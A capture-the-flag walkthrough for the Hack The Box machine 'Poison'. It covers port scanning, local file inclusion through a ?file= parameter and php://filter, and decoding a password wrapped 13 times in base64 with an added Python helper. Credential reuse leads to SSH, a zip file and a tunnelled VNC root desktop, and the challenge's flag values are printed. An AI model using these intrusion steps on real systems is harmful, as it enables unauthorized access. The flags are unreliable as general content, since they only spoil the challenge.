[HTB Notes] Poison

1. Check open ports
 nmap -sC -sV -oA poison 10.10.10.84
# 22/tcp   open  tcpwrapped
# | ssh-hostkey:
# |   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
# |   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
# |_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (EdDSA)
# 80/tcp   open  tcpwrapped
# |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
# |_http-title: Site doesn't have a title (text/html; charset=UTF-8).

2. Navigate to http://10.10.10.84/
[x] Submit “listfiles.php”
[-] [8] => pwdbackup.txt
[x] Submit “pwdbackup.txt”
#This password is secure, it's encoded atleast 13 times.. what could go wrong really..
[x] Save the encoded blob from “pwdbackup.txt” locally, then decode it
[x] Pipe the base64 command 13 times
 base64 --decode pwdbackup.txt | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
# Charix!2#4%6&8(0
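The 13-fold pipe above, as an added Python example (not from the original notes) that peels base64 layers automatically and stops when the payload no longer decodes, so you do not have to count the layers by hand. The blob is constructed inline with the same layering scheme rather than read from the box.

```python
import base64
import binascii

# Constructed sample: the password from the notes, wrapped 13 times with
# line-wrapped base64 the way a pasted backup file usually looks.
SAMPLE_SECRET = b"Charix!2#4%6&8(0"


def wrap_base64(data: bytes, layers: int) -> bytes:
    """Build the sample: apply wrapped base64 encoding `layers` times."""
    for _ in range(layers):
        data = base64.encodebytes(data)  # inserts newlines every 76 chars
    return data


PWDBACKUP_SAMPLE = wrap_base64(SAMPLE_SECRET, 13)


def _looks_textual(data: bytes) -> bool:
    """True if every byte is printable ASCII or whitespace."""
    return all(32 <= b < 127 or b in b"\r\n\t" for b in data)


def peel_base64(blob: bytes, max_layers: int = 64) -> tuple[bytes, int]:
    """Strip base64 layers until the payload stops decoding cleanly.

    Returns (plaintext, layers_removed). Whitespace is dropped before each
    decode because backup files are often wrapped at 76 columns. Decoding is
    strict (validate=True), so the first layer containing characters outside
    the base64 alphabet (here '!', '#', '%') is treated as the plaintext.
    max_layers guards against a plaintext that happens to be valid base64.
    """
    current = blob
    layers = 0
    while layers < max_layers:
        candidate = b"".join(current.split())  # remove line wrapping
        try:
            decoded = base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            break  # not base64 any more: `current` is the plaintext
        if not decoded or not _looks_textual(decoded):
            break  # decoded to nothing or to binary junk: stop here
        current = decoded
        layers += 1
    return current, layers


if __name__ == "__main__":
    secret, depth = peel_base64(PWDBACKUP_SAMPLE)
    print(f"{depth} layers -> {secret.decode()}")
```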
[x] Abuse the HTTP GET parameter (?file=) for LFI (Local File Inclusion), e.g. to read /etc/passwd:
[-] root:*:0:0:Charlie &:/root:/bin/csh
[-] charix:*:1001:1001:charix:/home/charix:/bin/csh
[>] Wrapping the include in php://filter base64-encodes the source file instead of executing it, so the PHP tags come back intact
[x] ?file=php://filter/convert.base64-encode/resource=_file_
[x] Base64-decode the encoded file to see the source code

3. Generate User Shell
 ssh -l charix 10.10.10.84
# Password for charix@Poison: Charix!2#4%6&8(0
[x] While inside shell:
 ls -la
# -rw-r-----  1 root    charix   166 Mar 19 16:35 secret.zip
# -rw-r-----  1 root    charix    33 Mar 19 16:11 user.txt
cat ~/user.txt
# eaacdfb2d141b72a589233063604209c
ps -auww | grep root
# Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes
# -auth /root/.Xauthority -geometry 1280x800 -depth 24
# -rfbwait 120000 -rfbauth /root/.vnc/passwd
# -rfbport 5901 -localhost -nolisten tcp :1
#
# Notice the Xvnc service runs on port 5901 and is bound to localhost only (-localhost), so it is only reachable through a tunnel
exit
# for now
[x] In your local terminal:
 scp charix@10.10.10.84:secret.zip /destination_directory
# Password for charix@Poison: Charix!2#4%6&8(0

4. Attempt Privilege Escalation (charix -> root)
[x] Extract contents of “secret.zip” file
[x] PASSWORD: Charix!2#4%6&8(0
[x] “secret.zip” contains “secret” file
[x] File contents look like gibberish, but this is the Xvnc password file referenced by -rfbauth /root/.vnc/passwd, which vncviewer can use directly
[x] Reopen the shell, forwarding local port 5902 to port 5901 on the box
 ssh -L 5902:localhost:5901 -l charix 10.10.10.84
# Password for charix@Poison: Charix!2#4%6&8(0
[x] In your local terminal:
 vncviewer -passwd secret localhost:5902
# Desktop name "root's X desktop (Poison:1)"
[x] Inside vncviewer:
cat root.txt
# 716d04b188419cf2bb99d891272361f5

SIDENOTES:
[x] Password reuse (web backup -> SSH -> secret.zip) was the key weakness of this box